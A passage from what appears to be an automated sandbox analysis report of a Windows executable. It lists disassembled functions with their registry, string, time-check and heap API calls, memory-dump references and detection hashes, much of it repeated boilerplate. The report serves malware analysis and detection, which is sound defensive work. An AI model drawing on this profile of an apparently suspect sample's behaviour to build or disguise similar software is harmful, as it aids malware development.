                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 7833371afd6c140abba13dd8e07d642c46a1eb3132b10047a20487b86bbc43f6
                            • Instruction ID: 82020f59344fc6159a2e0071469fe37aa810ad7da202beb8bd92d919fabde869
                            • Opcode Fuzzy Hash: 7833371afd6c140abba13dd8e07d642c46a1eb3132b10047a20487b86bbc43f6
                            • Instruction Fuzzy Hash: 9901B571A04218AFDB14EFACDC46B6EB7BCFB45B10F00012AF916E7380D7B4590087A1
                            Function 00D7D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00BFDC80,00000000,00020119,?), ref: 00D7D7F5
                            • RegQueryValueExA.ADVAPI32(?,00BFE1F8,00000000,00000000,00000000,000000FF), ref: 00D7D819
                            • RegCloseKey.ADVAPI32(?), ref: 00D7D823
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7D848
                            • lstrcat.KERNEL32(?,00BFE228), ref: 00D7D85C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: d2d00ee7de9cbb207349f4e3ec3680e4b4c9cc06d056e8ad8751bc31be1c7e4d
                            • Instruction ID: ff4737654c5c2bbc4d5519fe150ae1c0358e2bed81f583f104370f27f08702cd
                            • Opcode Fuzzy Hash: d2d00ee7de9cbb207349f4e3ec3680e4b4c9cc06d056e8ad8751bc31be1c7e4d
                            • Instruction Fuzzy Hash: 4E416075A1010C9BCB54EF64EC82BDE7779EF44344F048465B90AD7251EE70AA89CFB1
                            Function 00D77EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D77F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D77F60
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D77FA5
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D77FD3
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D78007
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 5d865519f3f8ee005dfd5f9396970e3c5c4a8097e62fa89c950ebdbb52aeb981
                            • Instruction ID: 2f2d316697bff59493acf2f7d2e6d73ea07ab3de26a485e3b12655c5b16b5ee6
                            • Opcode Fuzzy Hash: 5d865519f3f8ee005dfd5f9396970e3c5c4a8097e62fa89c950ebdbb52aeb981
                            • Instruction Fuzzy Hash: A441C43060811ADFCB20DF68D584EAEB7B4FF54300F118499E809D7351EB71EA55CBA1
                            Function 00D78050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D780BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D780EA
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D78102
                            • lstrlen.KERNEL32(00000000), ref: 00D78140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7816F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 3c626e1a6a1d5f40e1c6389d8b88b333c07117fa6edb4bed2f8bfbcb57d4b367
                            • Instruction ID: 322b28414a0830ae4a70b0e06d6ad6a9b244f5b80ddeb50f52faa8a6d453bd35
                            • Opcode Fuzzy Hash: 3c626e1a6a1d5f40e1c6389d8b88b333c07117fa6edb4bed2f8bfbcb57d4b367
                            • Instruction Fuzzy Hash: F0419E71A40206ABCB21DF78D958BAABBF4EF44300F19841DAC49D7204FF74D946DBA0
                            Function 00D81B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00D81B72
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8184F
                              • Part of subcall function 00D81820: lstrlen.KERNEL32(00BE7660), ref: 00D81860
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D81887
                              • Part of subcall function 00D81820: lstrcat.KERNEL32(00000000,00000000), ref: 00D81892
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D818C1
                              • Part of subcall function 00D81820: lstrlen.KERNEL32(00D94FA0), ref: 00D818D3
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D818F4
                              • Part of subcall function 00D81820: lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D81900
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D8192F
                            • sscanf.NTDLL ref: 00D81B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D81BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D81BC6
                            • ExitProcess.KERNEL32 ref: 00D81BE3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 3f200260234e263eb260b04c64b11f74cf2fee5ae3e478200184bcf8945a4f5d
                            • Instruction ID: a287d35f5cbee990adce68431ffabac03dfa14e4711fc41f7e48af215903176d
                            • Opcode Fuzzy Hash: 3f200260234e263eb260b04c64b11f74cf2fee5ae3e478200184bcf8945a4f5d
                            • Instruction Fuzzy Hash: EE21E6B5518305AF8350EF69D88585BBBF8FEC8214F405A1EF5A9C3220E770E5098BA2
                            Function 00D83130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D83166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8316D
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB5E8,00000000,00020119,?), ref: 00D8318C
                            • RegQueryValueExA.ADVAPI32(?,00BFDA60,00000000,00000000,00000000,000000FF), ref: 00D831A7
                            • RegCloseKey.ADVAPI32(?), ref: 00D831B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: b0dd89080014f609c63fb1b3b13520bf307fc37912dbfcbfd5ae9452f9bcd768
                            • Instruction ID: 696b36a2f147642e5e419a5635c02caf7062c51d986257aa5517afde56c314d9
                            • Opcode Fuzzy Hash: b0dd89080014f609c63fb1b3b13520bf307fc37912dbfcbfd5ae9452f9bcd768
                            • Instruction Fuzzy Hash: 11118272A04208AFD710DB99DC45FBBB7BCE749B11F00411AFA05E3680DB75590487A1
                            Function 00D890DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7b1c94b94bbede5ed95e47164b7813987f096b8f1c3143bd8e0ad8396f354928
                            • Instruction ID: e8549ff9ade671072e93dd1bcaa7d5d9c8a17fc08f905a0ec63399fba8f6c043
                            • Opcode Fuzzy Hash: 7b1c94b94bbede5ed95e47164b7813987f096b8f1c3143bd8e0ad8396f354928
                            • Instruction Fuzzy Hash: C641E67050475CAEDB219B248C99FFBBBFC9B45704F5C44E8E9C686182E2719A458F34
                            Function 00D68980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1D5
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D689CD
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 617fb4c91de7f16c0e1d669ebf9ab16b6911689638b23ac65886207bc45ea9be
                            • Instruction ID: f3bd2ba6c6ed7fb4c178695dffec8efe16ae61a684b69bab0993fad4e140727a
                            • Opcode Fuzzy Hash: 617fb4c91de7f16c0e1d669ebf9ab16b6911689638b23ac65886207bc45ea9be
                            • Instruction Fuzzy Hash: A921A3723006509BCB20DAACE840A6AF7E9DBA1761B250B3FF551CB281CB71D841D7B6
                            Function 00D68850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68883
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c6a438dbf9bc06480adb9813c0b593e1425ab5cefef4e7895af6f2b08c1ad208
                            • Instruction ID: d99fbe3bec9a8d13db2304d1c8b3293f4d417cb2d1346c0ed64c75af0c428ffe
                            • Opcode Fuzzy Hash: c6a438dbf9bc06480adb9813c0b593e1425ab5cefef4e7895af6f2b08c1ad208
                            • Instruction Fuzzy Hash: 4A3197B5E005159FCB08DF58C8916ADBBB6EB98350F188269E915AB345DB30AD01CBA1
                            Function 00D85910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85922
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85935
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
